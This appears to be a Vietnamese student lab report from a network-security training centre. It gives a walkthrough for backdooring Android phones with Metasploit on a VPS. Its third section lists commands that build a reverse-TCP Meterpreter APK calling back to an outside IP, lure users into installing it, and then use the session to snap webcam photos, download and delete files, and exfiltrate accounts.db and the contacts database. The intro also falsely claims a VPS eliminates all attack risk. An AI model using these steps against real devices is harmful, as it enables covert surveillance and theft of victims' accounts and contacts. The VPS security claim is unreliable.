hack android dùng metasploit cài trên vps
TRANSCRIPT
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
1
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO 4
Hack android dùng metasploit cài trên VPS
CBHD: Võ Đỗ Thắng
SVTT: Lê Trân Xuân Lanh
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
2
Mục lục 1. VPS là gì? ..................................................................................................................................3
2. Các tính năng và lợi ích của VPS ...............................................................................................3
3. Hack android sử dụng metaspoit cài trên VPS ..........................................................................4
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
3
1. VPS là gì?
Máy chủ ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo chạy dưới dạng chia sẻ tài nguyên từ máy chủ vật lý ban đâu. Trong khi trên 1
server chạy Share Host thì có thể có hàng trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy
VPS thì con số chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều lân.
Khác với hosting sử dụng phân mềm quản lý (hosting control panel) để khởi tạo và quản lý
các gói hosting, VPS được tạo ra nhờ công nghệ ảo hóa. Số lượng VPS luôn thấp hơn nhiều lân
so với số lượng hosting nếu cài đặt trên cùng một hệ thống server, do đó tính ổn định và hiệu
suất sử dụng tài nguyên của VPS luôn vượt trội so với hosting.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn
công.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên
server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website
khác cùng server, riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác
trên server đều không bị ảnh hưởng.
2. Các tính năng và lợi ích của VPS
Toàn quyền quản lý với tính năng như một máy chủ độc lập.
Độ ổn định và bảo mật cao.
Dễ dàng nâng cấp tài nguyên mà không làm gián đoạn dịch vụ.
Quản trị từ xa, cài đặt các phân mềm và ứng dụng theo nhu câu
Kết nối Internet với 01 IP tĩnh.
Hoạt động hoàn toàn như một server riêng nên sở hữu một phân CPU riêng, dung lượng Ram
riêng, dung lượng ổ HDD riêng, địa chỉ Ip riêng và hệ điều hành riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có
thể cài đặt để thực hiện những nhu câu riêng như truy cập Web bằng trình duyệt Web trên VPS,
download/upload bittorent với tốc độ cao...
Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không
phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành vời thời gian từ 5-10 phút
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
4
3. Hack android sử dụng metaspoit cài trên VPS
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file
vừa tạo.
Sauk hi tạo một backdoor được tạo, ta tải nó lên mạng.
Chờ máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
5
Ta vào máy VPS và mở Metasploit Console lên
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một liên kết với máy android mà ta sẽ hack:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
6
Chú ý: lhost và lport phải giống với lhost và lport khi tạo backdoor
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đa kết nối
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
7
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
Ta dùng lệnh sysinfo để xem thông tin máy android
Ta dùng lênh webcam_list để xem danh sách các camera
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
8
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
Để di chuyển đến thư mục nào ta dụng lệnh cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
9
Ta vào thư mục /sdcard/Download để down file về
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
Muốn xóa một file ta dùng lệnh rm <tên file>
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
10
Ta dùng lênh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đa được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
11
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Tiếp tục ta vào địa chỉ
/data/data/com.android.providers.contacts/databases
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
12
để copy file contacts2.db về Sdcard
Sau đó ta download file contacts2.db về máy VPS
Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6
13
Bên dưới là danh sách danh bạ ta down từ máy android đa được root. Ta mở file *.db bằng phân
mềm SQLite. Ta có thể down phân mềm đó về vài cài vào VPS của chúng ta
Hết